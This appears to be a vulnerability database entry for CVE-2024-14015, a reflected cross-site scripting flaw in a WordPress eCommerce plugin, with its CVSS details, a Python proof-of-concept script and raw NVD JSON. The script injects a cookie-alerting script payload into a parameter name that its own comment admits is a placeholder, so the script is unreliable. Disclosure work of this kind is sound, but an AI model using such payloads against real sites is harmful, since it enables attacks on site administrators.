Security Vulnerability Report
中文
CVE-2024-14015 CVSS 7.1 HIGH

CVE-2024-14015

Published: 2025-11-24 06:15:46
Last Modified: 2026-04-15 00:35:42

Description

The WordPress eCommerce Plugin WordPress plugin through 2.9.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WordPress eCommerce Plugin <= 2.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2024-14015 PoC - Reflected XSS in WordPress eCommerce Plugin # Target: WordPress site with eCommerce Plugin <= 2.9.0 TARGET_URL = "http://target-wordpress-site.com/" # Malicious JavaScript payload for XSS # This payload demonstrates the vulnerability by alerting the document cookie xss_payload = "<script>alert(document.cookie)</script>" # Construct the malicious URL with the XSS payload # The vulnerable parameter should be identified from the plugin's source code malicious_url = f"{TARGET_URL}?search_param={requests.utils.quote(xss_payload)}" print(f"[*] Target: {TARGET_URL}") print(f"[*] CVE-2024-14015 - WordPress eCommerce Plugin Reflected XSS") print(f"[*] Malicious URL: {malicious_url}") print(f"[*] Payload: {xss_payload}") # Send a request to verify the vulnerability try: response = requests.get(malicious_url, timeout=10) if xss_payload in response.text: print("[!] VULNERABLE - XSS payload reflected in response") else: print("[-] Not vulnerable or payload not reflected") except Exception as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-14015", "sourceIdentifier": "[email protected]", "published": "2025-11-24T06:15:45.683", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WordPress eCommerce Plugin WordPress plugin through 2.9.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "references": [{"url": "https://wpscan.com/vulnerability/1a70927a-e345-4e2f-98da-1235f4482cc0/", "source": "[email protected]"}]}}